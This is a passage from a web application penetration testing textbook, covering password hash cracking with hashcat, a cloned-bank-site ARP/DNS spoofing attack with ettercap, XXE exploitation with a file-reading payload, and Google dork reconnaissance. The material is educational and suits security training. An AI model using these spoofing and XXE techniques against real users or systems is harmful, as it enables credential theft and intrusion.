we come across a credential dump via another means, the same logic follows
in the event the passwords are hashed. An internet search for:
site:pastebin.com password hashes
will likely yield useful results especially when augmented with a specic
48 The Penetration Tester's Guide to Web Applications

known user account (possibly) or public company to associate with the com-
promised data.
On the command line, password cracking tools typically take several ar-
guments such as the input le comprised of the hashes we want to crack
(in the correct format), the type of cracking we want to perform (dictionary
based, brute force, etc.) perhaps an output le, and the type of hashes to
be cracked. For example, to successfully use the hashcat tool we will rst
download and compile it as this helps to ensure any special hardware at our
disposal is leveraged in our build:
git clone https://github.com/hashcat/hashcat.git
cd hashcat && git submodule update init
make && sudo make install
If successful, this should result in a binary/executable version of hashcat
we can now run with this command and arguments:
hashcat -m 0 -o Cracked MD5Hashes rockyou.txt

• -m 0: Species the type of hashes we will crack (MD5)


• MD5Hashes: The input le containing the hashes to crack
• rockyou.txt: The wordlist to hash and compare to the input
• -o Cracked: The output le where the cracked hashes are saved

The hashcat tool does have specic hardware requirements and is also in-
stalled by default in kali Linux. There are other options for tools such as
John the Ripper which is invoked in much the same way as hashcat. We
can see in Figure 4.3 and Figure 4.4 the hahses and invocation of the tool,
respectively.

Figure 4.3 Viewing a list of hashes in MD5 format.


OWASP A3:2017 Sensitive Data Exposure 49

Figure 4.4 Invoking John The Ripper to crack hashes.


Cracking hashes is a common occurrence throughout the course of penetra-
tion testing. At times we exploit vulnerabilities to access mysql hashes, bcrypt
hashes, MD5 hashes, NTLM hashes, and others which can all be cracked us-
ing the tools previously discussed as long as we provide a correct input format
and the correct command line argument for the tools.
The nal attack we will explore, as it pertains to sensitive data exposure,
is session compromise due to the lack of HSTS. As previously mentioned,
HSTS is used to ensure only HTTPS connections are established even when
a user action results in an initial HTTP request to the web application. By
typing www.example.com into the address bar in our browser and executing
this request, by default our browser will make a connection to the HTTP
version of the website if HSTS is not congured for the example domain. If
there is a HTTPS redirect such as a 301 response code pointing our browser
from the HTTP port to the HTTPS port, our browser will follow that and
we will end up on the HTTPS site with an authentic and encrypted HTTPS
session...unless a malicious attacker prevents the 301 redirect from occurring.
To execute this type of attack it is usually necessary to be on the same
network as the victim user such as the same LAN in the oce, or the same
WIFI network in a public location. We want to be on the same network so we
can manipulate the victim's trac and ultimately route their trac through
our device in order to launch additional attacks. The objective of this attack
is to take advantage of the lack of HSTS on a website to trick a victim user
to browsing to a malicious website or otherwise submitting their credentials
in plain text to us. To successfully execute this attack, we need to rst poison
layer two trac, specically the Address Resolution Protocol (ARP) trac
via an ARP poisoning attack. We can also poison layer seven DNS requests
to achieve the same goal, which is to trick others on the same network into
communicating directly with our machine instead of the legitimate originally
intended machine. A tool to help with this is ettercap. Ettercap (ethernet
capture) supports DNS spoong, MiTM attacks, and active connection ma-
nipulation as well as passive reconnaissance. Similar to many of the other
tools discussed so far, it too is installed by default in Kali Linux. Let's ex-
50 The Penetration Tester's Guide to Web Applications

plore a DNS spoong attack to trick a victim into browsing to a fake/spoofed


web application. To begin this attack, we rst need to have our victim ma-
chine (or target network) identied as well as the target website we want to
spoof. A great way to copy the client-side components of a website (HTML,
CSS, scripts and images) is to use Firefox to browse to the legitimate web-
site and choose File -> Save As to save the contents of the website to our
computer as we can see in Figure 4.5.

Figure 4.5 Using our browser to save the client-side components of a website.

From here we can simply copy the resulting les (a home page and folder
containing the content) to our own web server's home directory and start
Apache to serve the spoofed copy on our own web server. The examples
below convey how to accomplish this, the results of which can be seen in
Figure 4.6. Some modications to the HTML and local content references
may be necessary to make sure images show up properly and links work as
expected.
# cp -r Downloads/Bank Website* /var/www/html
# cd /var/www/html
# cp Bank Website.html index.html
# service apache2 start
# refox 127.0.0.1
OWASP A3:2017 Sensitive Data Exposure 51

Figure 4.6 View of our copied banking website being served locally.
Once we are satised with the copied website, we can now focus our atten-
tion on ettercap to launch the DNS poisoning attack. Before starting et-
tercap we need to modify its DNS conguration le in /etc/etter.dns. The
le is well commented; what we need to do is place our target domain on a
new line dening our attack server's IP address, which should be the same
host on which we are running our Apache web server. For this example,
our target/victim's host is 10.8.40.6, our attack machine (running Apache)
is 10.8.40.4, and the website we are going to impersonate is bigexample-
bank.com. Thus, the resulting etter.dns le would contain a new line like this
(with tabs between each eld):
bigexamplebank.com A 10.8.40.4
With the DNS conguration complete we can now run the ettercap tool
with this command:
ettercap -T -i eth0 -M ARP -w output -P dns_spoof /10.8.40.6///
• -T: Species to stay in text mode
• -i eth0: Species our network interface
• -M ARP: Species to launch an ARP poising attack
• -w output: Chooses the le to write output to
52 The Penetration Tester's Guide to Web Applications

• -P dns_spoof: Selects the DNS spoong plugin


• /10.8.40.6///: Species the single target (the victim machine)
Once we execute this command we can monitor the network trac on
the victim machine with wireshark or tcpdump to see all of the gratuitous
ARP trac and ultimately when we, acting as the victim, use the machine
10.8.40.6 to browse to bigexamplebank.com, we are directed to the attack
machine at 10.8.40.4 where our Apache web server serves the spoofed banking
page, which we can see in Figure 4.7.

Figure 4.7 Browser view of spoofed website matching legitimate domain name.
At this point a victim would think they are on the legitimate website (unless
they paid special attention to the lack of HTTPS in their browser's address
bar) and proceed to login with their credentials. In a dierent setup, we could
choose to route their requests to the legitimate website essentially acting as a
relay server between the victim client and the insecure host/domain (banking
website in this example). In this fashion we can gather credentials and gain
access to the legitimate banking website. We could even setup a spoofed 2-
factor authentication prompt and relay that to the legitimate website to gain
access to the victim's account.

Link to hands-on portion: https://tptgtwa.com/owasp3


Root Cause and Conclusion: The ARP and DNS protocols don't have
built-in authentication/security to prevent the above scenario from working,
OWASP A3:2017 Sensitive Data Exposure 53

although there are other ways to secure a network and eectively thwart a
spoong and poisoning attack. In this chapter we discussed how Sensitive
Data Exposure can manifest itself, and how we as attackers can use several
tools to help exploit poorly congured websites. Inadequate caching control,
leaked credentials, and missing security headers are all scenarios web appli-
cation penetration testers will come across in time. Interestingly, the entire
last example, ARP poisoning and DNS spoong, would have been much less
likely to dupe a victim into divulging credentials if only the HSTS header
were set for bigexamplebank.com. In fact, just because we spoofed the DNS
record for a banking website doesn't mean we can bypass the HSTS preload
built into the browser. The mere existence of this header would have resulted
in a browser warning regarding the untrustworthy SSL certicate. Note that
as of 2019, gmail still does not have the HSTS header set. Cryptography
works in most cases when congured properly: bcrypt and scrypt hashes
take signicantly more time to crack compared to MD5, whereas enforcing
TLS connections forces attackers to try harder to compromise connections.
The exposure of sensitive data comes in many forms; as attackers it benets
us to be familiar with various web application vulnerabilities and useful tools
to help with exploitation.
Chapter 5

OWASP A4:2017 XML


External Entities (XXE)
Denition: Many older or poorly congured XML processors evaluate exter-
nal entity references within XML documents. External entities can be used to
disclose internal les using the le URI handler, internal le shares, internal
port scanning, remote code execution, and denial of service attacks.

Details: As with other OWASP top ten vulnerabilities, XXE is an attack that
takes into account several elements, such as a webserver hosting a vulnerable
application, a poorly congured XML processor, an attacker, and the ability
to submit input which will be processed by the vulnerable XML processor.
Let's discuss these components and the intricacies of XXE in more detail.
XML (Extensible Markup Language) is a markup language (like HTML)
commonly used on the web to facilitate the storage and transportation of
data. XML is self-descriptive and comprised of user dened tags as opposed
to HTML, which has a limited number of predened tags developers can
utilize. Figure 5.1 shows an example of XML. Note the arbitrary names of
the tags and the equally arbitrary values dened within each tag; the rst
line in this example is called the prolog.

55
56 The Penetration Tester's Guide to Web Applications

Figure 5.1 Basic XML example.

An XML processor is software which is designed to read input, such as the


XML in the image above, and convert it into an XML DOM object or other
representation specic to the processor via a process called parsing. XML
processors can conrm the XML input is valid (we call this a validating
XML processor) or not (nonvalidating XML processor) and this processing
software is commonly written in Java, JavaScript, Perl or Python, but not
commonly custom written for each application  the importance of which will
become evident later in this chapter. The complexity of an XML document
can be signicant, and therefore, there are times when it is useful to dene
the various attributes, structures, notations, elements and entities of an XML
document. This is accomplished with a Document Type Denition (DTD).
An entity, as it pertains to XML, is essentially a placeholder. We can declare
an entity in the XML document's prolog or in the DTD and the entity can
be local or external from the perspective of the XML document. An example
of how a legitimate (nonmalicious) internal entity would be used is depicted
in Figure 5.2:

Figure 5.2 XML internal entity.

Note this internal entity has been dened in the local DTD (hence standalone
being set to yes in the prolog) and is merely serving as a placeholder for the
author's name. This is useful when there is a need to repeatedly reference the
author without wanting to hardcode it. Also note the syntax of the entity as
shown in the author element: The beginning ampersand "&" followed by the
entity name and nally the semicolon. Below is an example of an external
OWASP A4:2017 XML External Entities (XXE) 57

entity reference. The example in Figure 5.3 introduces a few more components
of XML useful to discuss, and which will help us eventually craft an attack
we can understand and appreciate.

Figure 5.3 XML external entity.

In this example the SYSTEM keyword denotes the entity is private (the
concept being this entity would be reserved for perhaps a single author of
the document) contrasted with the PUBLIC keyword. The reference to the
evilsite.info URI denotes the location where the entity can be found (and
would subsequently be incorporated into the document) and since this is
no longer local, "standalone is set to no in the prolog. For thoroughness,
PCDATA refers to Parsed Character Data, which will be parsed by the parser
opposed to CDATA (Character Data), which will not be parsed  tags inside
CDATA will not be treated as markup and entities inside of CDATA will
not be expanded. With this knowledge, a possible attack would be to replace
the reference to the URI with that of a le from the vulnerable application's
local lesystem. This would in turn tell the parser to replace the reference
to the entity with the le and subsequently display its output as shown in
Figure 5.4.
58 The Penetration Tester's Guide to Web Applications

Figure 5.4 Output of successful attack showing /etc/passwd results.

This example shows that we as an attacker can submit crafted input to


exploit the vulnerable parser. Specically, the input we provide will be used
to reference les on the impacted OS. This works is by declaring entities in out
attack input, these entities are then read by the XML parser and subsequently
called later by the XML parser to perform a type of text replace function.
In the event we have access to control the input which will be sent to the
XML processor, we have the opportunity to put in whatever arbitrary values
we want and have them handled by the parser. The impact of this attack
is typically limited to an information disclosure vulnerability, meaning we
can read local les on the OS hosting the vulnerable application. We can
also list directories (so basic unix "ls" and "cat" like functionality), specify
the entire path to list, and of course the lename we want to read. We are
however limited by the permissions on the lesystem in terms of what we can
list. For instance, the /etc/passwd le is globally readable so we can see the
contents of that le. The /etc/shadow le however is not, thus we can list the
contents of /etc but can't read the shadow le unless perhaps the vulnerable
application's XML parsing component is running as root. This is important
to keep in mind; as with other vulnerabilities which provide us with a level
of access on the OS, our level of permission is dictated by the permission of
the account under which the vulnerable application is running.
There are a limited number of exploit paths for an XXE attack. The im-
pact of the vulnerability relies on the XML processor primarily as it relates
OWASP A4:2017 XML External Entities (XXE) 59

to its conguration. For instance, remote code execution is typically rare, and
depends on the type of XML processor being used and how it has been writ-
ten. More often, the information disclosure of listing directory contents and
reading les is the extent of the aw. We can typically use this aw to gain a
foothold when we are able to read les which contain sensitive information.
Examples of this would be SSH key les, les containing passwords, and even
web server source code les which, when resulting in source code disclosure,
can also lead us down a path of remote compromise. As this aw will re-
sult in the ability to list directory contents and read les, it behooves us as
penetration testers to have a comfortable/deep understanding of lesystem
structures and locations of interesting les. XXE, as with other application
layer vulnerabilities, impacts the application oftentimes regardless of the un-
derlying operating system, thus in the case of XXE the OS may be running
Windows, Linux, or BSD. Knowing the structure of the lesystem associated
with the OS will help us craft more potent and fruitful attacks.
Processing XML is not an overly complex task and can in fact be accom-
plished with only a few lines of code when leveraging suitable libraries to
assist in the process. For instance, the XMLHttpRequest object has an XML
parser built in and can be leveraged in our browser to handle this. Conversely,
in many situations processing and parsing XML documents can be a cum-
bersome task best suited for dedicated programs purpose-built for the job. It
is this latter fact which lends itself to error-prone consequences meaning that
oftentimes a commercially available (or open-source) processor is vulnerable,
and the business/application relying on this software is at risk of compro-
mise. Commonly a business is accustomed to purchasing software to provide
a solution (like HR and payroll benets) and is not responsible for updating
or maintaining the code. Likewise, the consumer of a commercial product is
generally ill-equipped to perform any type of security testing/scanning of the
commercial software they purchase. Due to this, it is not uncommon for at-
tackers to be the rst to discover an XXE aw in externally available systems
supporting end user XML input.

Real-World Dialog: During a recent external network penetration test I


came across several systems that exposed a web interface, which is quite com-
monplace. Because the nature of the penetration test was network-focused
 and because I have it at my disposal, I used Nessus to perform a scan of
the external network, and the results of this scan identied an XXE vulner-
ability on several hosts. The output of the Nessus scan results showed the
URI to target, the vulnerable parameters, and actually provided a successful
60 The Penetration Tester's Guide to Web Applications

attack string to exploit the aw. So, at this point the identication of the
aw was conrmed and I even had the code required to exploit. My next
step was to take the attack code (which was basically just an HTTP POST
request) and utilize Burp to rst conrm that I could reproduce the nding
(Nessus did show the results of the /etc/passwd le so I had a high level of
condence the nding was legitimate) using my own tools since reproducing
the aw ensures there is not a false positive, and of equal importance, this
enables me to tweak the POST request to meet my needs. Burp's repeater
tool is a great choice to use when there is a need to modify HTTP requests,
submit them, review the results of the request, and continue to modify until
the request is perfect. Using Repeater, I was not only able to reproduce the
original request and conrm the aw but also specify other les and folders
to view. The successful exploit can be seen in Figure 5.5.
OWASP A4:2017 XML External Entities (XXE) 61

Figure 5.5 POST request showing successful XXE attack.

At this point I was able to view local directory listings on the OS hosting the
vulnerable application, local from the perspective of the OS, but remote from
my perspective, and was able to read les which I had permission to read.
I had access to navigate the entire lesystem and wrote a custom script to
aid in automatically parsing le contents. This was implemented in bash and
leveraged wget to make the POST request followed by parsing the contents
62 The Penetration Tester's Guide to Web Applications

of the results le. The challenging part of the script was writing the logic to
determine whether the results were contents of a le or a directory listing as it
was not always evident from the results of the POST request without manual
review. After running the script, I reviewed the resulting les which had
been downloaded and grepped though them for keywords such as password
and key. Within several user directories were improperly congured ssh keys
which I was able to read. From there, gaining SSH access to the vulnerable
systems was trivial. The XXE vulnerability resulted in the compromise of
several hosts and served as the initial vulnerability that led to the eventual
compromise of the entire environment.

How to Exploit: The rst component of successful exploitation centers on


correct identication of the XXE vulnerability. The example provided earlier
made use of Nessus for the initial identication of the aw followed by manual
validation and exploitation. What we want to look for when manually trying
to identify XXE vulnerabilities is the existence of XML parsing. This can
be in the form of an API endpoint, a le upload, an HTTP parameter, and
other attack surface already covered in this book. Without prior knowledge
of the application, we need to rely on our previous reconnaissance/mapping
to conceptualize logical points of entry and subsequently craft a suitable at-
tack. Depending on the potentially vulnerable component of the application,
our attack will look dierent; for example, if the XML parser is invoked
when reading user provided les, then logically we would need to format a
le to house the XXE attack. Likewise, an API's required request parame-
ters/headers will need to be satised just like the POST payload  all these
things will need to be crafted in such a way as to not cause a respective error
during our transmission of the request. We'll cover examples of how to do this
momentarily, but rst let's focus on the identication of the vulnerability.
One way to identify an XXE weakness is to leverage previously discussed
techniques to fuzz various application inputs and examine the responses from
the application. We are looking for errors indicative of a poorly congured
XML processor and we are sending payloads consisting of strings likely to in-
duce those errors. Specically, strings such as single quotes and double quotes
(used for quoting values), brackets (used for CDATA section delimiters) am-
persands "&", comments "<! >" and opening/closing brackets < and >,
all of which could interfere with normal processing of an XML document.
The expected results from a vulnerable XML parser will vary depending on
several factors such as the software in use, the dened error messages, and
exception handling at the application layer or WAF. To help automate this
OWASP A4:2017 XML External Entities (XXE) 63

identication phase we can leverage the fuzzing feature of ZAP and will exe-
cute our attack on the prole/quote input on the vulnerable HR management
system depicted in Figure 5.6.

Figure 5.6 Web interface showing user quote.

The form's text box allows us to submit input to the application which will
in turn be handled by an XML processor. The resulting text, if valid, will
be used to update our "user quote". After enabling ZAP and conguring our
browser to leverage the proxy, we rst prime ZAP with the applicable POST
request. The next step is to fuzz the input with each of the attack strings
mentioned a moment ago and then launch the attack in order to try and
invoke an error. In reality, if we are only submitting a dozen or so strings then
64 The Penetration Tester's Guide to Web Applications

manually submitting these via our browser is oftentimes sucient as opposed


to using another tool; there is no value in adding unnecessary complexity. If
our attack strings don't cause an error, we would expect the user quote to
be updated with the text we submit and consequently shown on the prole
page of the application when accessed by our browser. If the input causes an
error, we should expect the quote to not be updated and an error message to
be displayed in our browser (or the proxy's/fuzzer's HTTP results). Figure
5.7 shows the POST request we want to fuzz as well as ZAP's UI presenting
us with the option to do just that.
OWASP A4:2017 XML External Entities (XXE) 65

Figure 5.7 Invoking ZAP's fuzzer.

Focusing on the response size (the size, in bytes, of the HTTP response
from the server) we can see there is an evident dierence for several of the
submitted inputs per Figure 5.8.
66 The Penetration Tester's Guide to Web Applications

Figure 5.8 Fuzzing results.

ZAP is doing what we told it to do: launching the fuzzing attack. This tool
however is not going to have the context in this instance to understand the
attack we launched or the impact/relevance of the strings submitted and
subsequent results from the application. The point is, it is incumbent upon
us as the attacker to understand what we are doing and wield our tools
accordingly. Even using the built-in scanning feature of ZAP failed to identify
the XXE vulnerability on this page, as seen in Figure 5.9.
OWASP A4:2017 XML External Entities (XXE) 67

Figure 5.9 ZAP alerts showing some ndings but not XXE.

Specically as it pertains to the output of Figure 5.10, we can see on the far
right of the bottom portion of ZAP's output the parameters submitted using
the fuzzer, starting with < and proceeded by > , . <! and so on from top to
bottom. The highlighted input shows a response size of 3,664 bytes, which is
not only dierent from all of the other response sizes but also the largest.
68 The Penetration Tester's Guide to Web Applications

Figure 5.10 Output of fuzzing showing application error.


Naturally gravitating to this <! parameter as one of interest yields the ap-
plication's response showing a Fatal Error on line 45, meaning the XML
processor seems to have taken our input as a literal comment and in doing so
caused an XML error. This, similar to other injection attacks, is our indica-
tor pointing toward a possible vulnerability in the application. This chapter
focuses on XXE, therefore this is likely an error indicative of this aw, but in
the real world it is not always obvious and it is wise to use a quality search
engine to assist in researching unknown errors. For instance, the rst search
OWASP A4:2017 XML External Entities (XXE) 69

result for a query of "error comment not terminated" points to an XML


parsing error so we know we are on the right track.
At this point we have a level of condence the application is vulnerable to
XXE and have likely identied the injection point. The next step is to invoke
additional error messages, leverage the errors to craft a suitable attack and
proceed to attempt to exploit the target application. Let's focus on some
examples of how to do this.

Examples: Continuing with the HTML form example, let's work to invoke
additional error messages. ZAP's Open/Resend with Request Editor tool (as
well as Burp's repeater which is essentially the same thing) will work great
for this. Since we know the POST payload and request to focus on, we can
begin by modifying the payload to include an attack string specic to the
application and input. Submitting the string:
userquote=<!DOCTYPE test [ <!ELEMENT test ANY ><!ENTITY xxe
SYSTEM "le:///etc/passwd" >]><quote>&xxe;</quote>
Yields the output of multiple errors including these below and also shown
in Figure 5.11:
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 2
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 19
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 39
Fatal Error 76: Opening and ending tag mismatch: quote line 4 and q Line:
5 Column: 6
Fatal Error 76: Opening and ending tag mismatch: q line 3 and uq Line: 6
Column: 6
Fatal Error 77: Premature end of data in tag uq line 2 Line: 6 Column: 6
70 The Penetration Tester's Guide to Web Applications

Figure 5.11 Viewing response of manual request in ZAP.

In viewing this error output, we are presented with clues on how to modify
our input to resolve the errors and hopefully end up with valid XML syntax
that includes our payload (in this example the /etc/passwd reference). Let's
modify the attack input to try and resolve the errors. Based on the rst error
it looks like the standard XML prolog may be expected in this example, so
adding in <?xml version='1.0'> might help our eorts. There also seems to
be an in correctly typed quote as both single and double quotes are being
OWASP A4:2017 XML External Entities (XXE) 71

used. The tag mismatch errors may be corrected with the modications al-
ready made. Resubmitting the request with ZAP now yields the expected
/etc/passwd output as seen in the respective request and response Figures
5.12 and 5.13.

Figure 5.12 POST request showing XXE payload.


72 The Penetration Tester's Guide to Web Applications

Figure 5.13 Response from application showing successful XXE attack.

Attacking a vulnerable API would be handled in much the same manner as


the HTML form, so for the next example let's turn our attention to a le
upload XXE vulnerability. For this example we have an API which allows us
to upload a le; an XML processor will in turn process the le and parse out
the XML to save to a database and display to us for conrmation. To attack
this le upload feature with the XXE vulnerability we will want to create
a le containing our XXE injection payload. As previously learned, syntax
matters so we need to be sure our formatting is correct, our syntax is valid,
and our payload is suitable for the operating system we are targeting. Most
public APIs include documentation we can leverage to understand how to
communicate with them and produce valid requests, as seen in Figure 5.14.
OWASP A4:2017 XML External Entities (XXE) 73

Figure 5.14 API documentation including Curl request syntax.


Using this documentation we can gure out how to craft a working request
that would include the required HTTP headers (key and resource) and a le
(NewUser) containing the XML to create the user. The sample XML for such
a request can been seen in Figure 5.15.

Figure 5.15 XML required to create a new user.


A legitimate request to the API and the subsequent results would look like
74 The Penetration Tester's Guide to Web Applications

Figure 5.16:

Figure 5.16 Curl request from command line.

The command is:


curl -H "key:44A00A7C0BC7D00826068281834F76C3" -H "access:user" -d
@NewUser http://10.0.0.193/API
Subsequently, the results echo the newly created username and other ac-
count information indicating a valid request. At this point we have success-
fully submitted a request to the API and need to focus on attacking it. To
do so we can simply alter our NewUser le to include the malicious payload
which will be similar to previous XXE payloads. An important note to re-
member is that our syntax needs to be valid just as we need to satisfy the
requirements of the API, thus if an API key is required or a special header
and specic parameters (or XML tags), we need to be sure we include those
as well. The modications to the NewUser le can been seen in Figure 5.17
along with the resulting exploitation of the XXE vulnerability in Figure 5.18.

Figure 5.17 Malicious XXE attack.


OWASP A4:2017 XML External Entities (XXE) 75

Figure 5.18 Results of XXE attack showing successful retrieval of sensitive


information.

In a production environment, leveraging this XXE/API aw would result in a


potentially signicant number of new users being created with bogus account
information. Exploring this concept could lead one to contemplate a denial of
service scenario, and in fact, this is another potential result of XXE. To per-
form a denial of service a malicious user could submit self-referencing entities
so that entity "a" referenced entity "b" which references entity "a" and so on;
this would cause a vulnerable XML processor to consume resources as it tries
to process the innite loop of entities essentially. Due care is required when
attacking production systems and as previously mentioned, DOS is rarely
in-scope so proceed with caution.

Link to hands-on portion: https://tptgtwa.com/owasp4


Root Cause and Conclusion: Denial of service, information disclosure,
and remote code execution are possible when exploiting XXE  the impact
depends on the conguration of the XML processor. When creating the labs
and demos for this chapter I found that by default several popular XML pro-
cessing solutions were vulnerable to XXE, and in fact, a developer would have
to dedicate special attention in securely handling input in order to provide an
eective control against this attack. Additionally, there are a limited number
76 The Penetration Tester's Guide to Web Applications

of tools available to help identify or exploit this vulnerability. A quick web


search will likely yield less than ve such tools, and of those ve maybe one
has been recently updated. Nevertheless, they do exist and can aid in some
out of band (OOB) attacks as well as basic exploitation such as le/directory
enumeration. As with any vulnerability, the risk of XXE needs to be taken in
the context of the nding and the potential for impact. With that being said
it should not be overlooked during testing or underrated as a useful means
to, at a minimum, gather additional information about a target.
Chapter 6

OWASP A5:2017 Broken


Access Control
Denition: Restrictions on what authenticated users are allowed to do are
often not properly enforced. Attackers can exploit these aws to access unau-
thorized functionality and/or data, such as access other users' accounts, view
sensitive les, modify other users' data, change access rights, and so on.

Details: Access control is all about authorization; the permissions a given


user has and what the user is authorized to do. In most cases the application
in question performs some type of authentication when the user proves they
are who they say they are, and subsequent requests are checked to ensure the
user has a valid session and that the user is allowed to access the resource
they are requesting. This is a critical check that applications must perform
whenever a user attempts to access a resource. This resource could be func-
tionally intended for administrative users, or it could be a feature specic
to a user account or other component of the application. When this access
control is not in place or not functioning properly, the aw would typically
fall under this category of vulnerability (broken access control). Common
applications are written is to logically check near the top of a page's source
code if a user is logged in as well as what their role is (what permissions
they have). This logic can be as simple as connecting to a database and exe-
cuting a SELECT statement to obtain the user's role and then determining
if that role is sucient to access the page or otherwise honor the request
the user submitted. PHP, Ruby, Java, .NET/C#, and other commonly used

77
78 The Penetration Tester's Guide to Web Applications

programming languages all provide a method to control access to objects and


resources within a web application. Because of this, access control exists in
many applications; it is just oftentimes poorly implemented, hence its place
as number ve on the OWASP top ten. One of the challenges of implement-
ing this control properly is the complexity of applications, a potentially vast
number of roles and resources to keep track of, as well as increasing attack
surface via exposed APIs. From an attacker's perspective, identifying bro-
ken access control lends itself to manual testing in the sense that automated
tools are not well suited to discover this aw. Web application vulnerability
scanning tools can detect when access controls are not in place but they gen-
erally fail to detect if the controls are working as intended. This is because
a tool doesn't understand what a privileged function or resource is unless it
is programmed to specically look for one. In terms of scanning tools, this
level of specicity or custom application development does not scale across
unique applications and thus a manual approach works best. With that being
said, there are some tools that can at least point us in the direction of broken
access control and this is what we are looking for: the ability to access pages
we should not be allowed to access, the ability to submit forms we should
not be allowed to submit/execute API calls, the ability to escalate privilege,
and nally the ability to circumvent or otherwise bypass access controls in
general.

Real-World Dialog: One of the more interesting examples of broken access


control I discovered was coupled with an authentication bypass aw and
allowed me to gain access to arbitrary user accounts. The aw existed on the
login pages of the application where the ow consisted of a page requesting a
username followed by another page requesting a password. This can be seen
in Figure 6.1 and Figure 6.2.
OWASP A5:2017 Broken Access Control 79

Figure 6.1 Initial login page for application.

Figure 6.2 Second login page for application.

The login process looks simple enough, the problem is that the authorization
(as well as authentication in this case) occurred as soon as the username
was submitted. Specically, by inputting a valid username I was able to gain
access to that user's account while completely bypassing the rest of the login
process. I have come across issues like this on various web applications, the
root cause of which stems from a broken access control system; a failure to
80 The Penetration Tester's Guide to Web Applications

validate the request properly before granting access. To elaborate on how this
was possible, keep in mind that this was a white-box test so I had access to
several valid accounts. I proceeded to start the login process using one of the
test accounts and took notes of what page I was redirected to (home.aspx)
once I successfully authenticated to the application. With this information
I logged out, and submitted a dierent username on the rst login page
and then simply force browsed to home.aspx which ended up showing me as
logged in and authorized to access all of the account features for this user.
The hard part was categorizing this vulnerability as it's clearly an example
of broken authentication just as it's indicative of broken access control. We'll
explore this and techniques for exploitation in more detail next.

How to Exploit: Exploiting a broken access control scenario as an attacker


requires us to once again perform our due diligence in properly and thor-
oughly mapping the application to identify potential attack surface and areas
where the possibility of broken access control might make sense. To do this we
want to leverage our interception proxy (Burp Suite or ZAP) with an authen-
ticated account, paying special attention to administrative functions/pages.
When we come across a request which is suspect or would benet from ad-
ditional scrutiny, we can make a note or comment directly from within our
tool, as seen in Figure 6.3.
OWASP A5:2017 Broken Access Control 81

Figure 6.3 Adding a comment within Burp.


Subsequently we would sort by the comment column within Burp once we
are satised with our mapping endeavors, and follow up with the notated
requests. But how do we know if a request deserves further scrutiny? Think
back to the aw we are trying to identify  Broken access control, and focus
on requests exposing the username or administrative features of the appli-
cation. For instance, administrators may be allowed to provision accounts,
change passwords, add rules, congure the system, and so on; what we want
to do is take note of the request being made when one of these administrative
level requests is submitted and simply try to duplicate it as a regular user
or as an unauthenticated visitor of the website. Remember, as a professional
penetration tester it is not uncommon to request administrative level access
to the application. It is in this manner which we can fully explore all of the
features of the application and perform a thorough test of the application. On
82 The Penetration Tester's Guide to Web Applications

this subject here is a word of caution: Running an automated vulnerability


scanning tool with administrative credentials is a great way to cause harm,
so avoid it unless scanning a nonproduction impacting version of the appli-
cation. As an aside, an environment dedicated to UAT could have the ability
to interact with production databases depending on how it's congured; be
careful and know the environment. Also ensure regular backups are made of
the web application and a mature restoration process is in place. To reiterate,
use administrative credentials (if you have them) in a manual and controlled
way while making notes of privileged features/functions/requests, but don't
use those same credentials as part of an automated scan of the application.
We can also attack GET request parameters and POST payloads to manip-
ulate client-side data in the hopes of exploiting the application. There are
some attacks we can consistently execute regardless of the application to try
and identify aws, whereas in other cases, the very nature of attacking a
custom-built application means that our attack also needs to be customized
to the environment. A useful method to help identify potential access control
issues is to leverage Google. In fact, Google dorks can be quite useful as us-
ing Google's eorts to spider the site allow us as attackers to passively nd
aws. This is a passive attack because we are simply using Google's search
results (and consequently only interacting with Google at this point) to try
and ascertain whether an application has directory browsing/indexing en-
abled. Directory indexing is a web server conguration setting which allows
the contents of a directory to be shown in a tree/hierarchical view, in essence
showing all of the les in a given folder. This view will be shown when brows-
ing to the root directory of a website which has this feature enabled. We can
see an example of this in Figure 6.4.
OWASP A5:2017 Broken Access Control 83

Figure 6.4 Directory browsing output.

While this is a conguration setting from a server administrator's perspec-


tive, it is also considered an information disclosure vulnerability in certain
circumstances. Directory indexing can make our job easier as attackers be-
cause we can now see all of the resources that may be lacking access controls
or exposing source code (in the case of backup les), which we can use to
reverse engineer access controls which may be weak.

Examples: Search engines do a good job of scanning the web, nding pub-
licly available websites and data, and making this information available for
us to easily search. When a website is miscongured and subsequently leak-
ing sensitive information, divulging error messages (useful for SQL injection
for example) or other information we can use to attack it, Google, Bing,
Shodan, and other search engines often encounter this, save it, and make
this information available to search as well. This situation is not limited to
websites and error messages, but to any internet-connected device and any
useful information including version numbers. Think about it from this per-
84 The Penetration Tester's Guide to Web Applications

spective: if we can use a search engine to quickly nd which websites are
running version x.x of software z (like OpenSSL version 1.0.1f) and there
is a known exploit for this version of the software, then we can leverage
the search results to compile a list of hosts to attack. In some situations
the search results themselves will leak the sensitive information attackers
are seeking, and these are the concepts behind Google Dorks. As Google is
the best at what it does in the search realm, it is the de facto tool used
to identify some classes of vulnerabilities including those leading to broken
access control. Successfully using Google to obtain this type of information
relies on us knowing the various search operators and how to wield them cor-
rectly. The basic syntax to obtain search results showing only results from
our target website is: site:example.com where example.com is replaced with
the actual target web application (note there is no space between the colon
and the target). This is useful for reconnaissance as it will output all of the
dierent hosts (like www.example.com, ftp.example.com, login.example.com,
api.example.com, dev.example.com, etc.) Google is aware of and allowed to
show for the target domain, which we can further lter with the - sign to
exclude certain, perhaps already known hosts. See Figure 6.5 and Figure 6.6
for examples.
OWASP A5:2017 Broken Access Control 85

Figure 6.5 Results of Google's site directive.


86 The Penetration Tester's Guide to Web Applications

Figure 6.6 Results of a more complex Google search query.

Let's add to this by introducing more operators to further narrow down ex-
actly what we are looking for, such as directory browsing and interesting
documents. Documents like PDFs, DOCXs, images, and the like can have
embedded metadata which we can parse through to gain access to potential
usernames, details on the version and software used to create the documents,
and other interesting information we can use to our advantage. This is accom-
plished by simply adding the ext operator with an accompanying extension
like site:example.com -www.example.com ext:pdf. This will show results from
all hosts on the example.com domain except for the www.example.com web-
OWASP A5:2017 Broken Access Control 87

site and should only display PDF documents. We can subsequently click on
each link and download each PDF (or automate this process) and then use
exiftool to search for interesting metadata as shown in Figure 6.7.

Figure 6.7 Metadata output as seen from command line using exiftool.

Directory browsing/indexing (it's known and referenced as both names) can


be found with the Google Dork index of and will yield results similar to those
shown in the How To Exploit section of this chapter. By further ltering
the results with additional operators however, we are reducing the potential
number of out-of-scope results.
There are caveats with this method of searching for known aws such
